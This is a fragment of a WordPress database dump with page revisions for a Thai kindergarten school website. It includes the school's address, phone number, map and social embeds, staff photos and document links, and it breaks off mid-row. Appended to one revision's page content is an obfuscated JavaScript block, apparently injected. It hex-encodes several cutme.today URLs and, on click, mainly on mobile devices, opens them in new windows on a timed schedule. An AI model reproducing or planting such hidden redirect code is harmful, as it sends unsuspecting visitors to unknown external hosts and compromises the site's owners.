{\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 15:57:56','2025-07-15 08:57:56','',19,'http://watprato.ssk.in.th/?p=701',0,'revision','',0),
(702,1,'2025-07-15 15:59:27','2025-07-15 08:59:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- 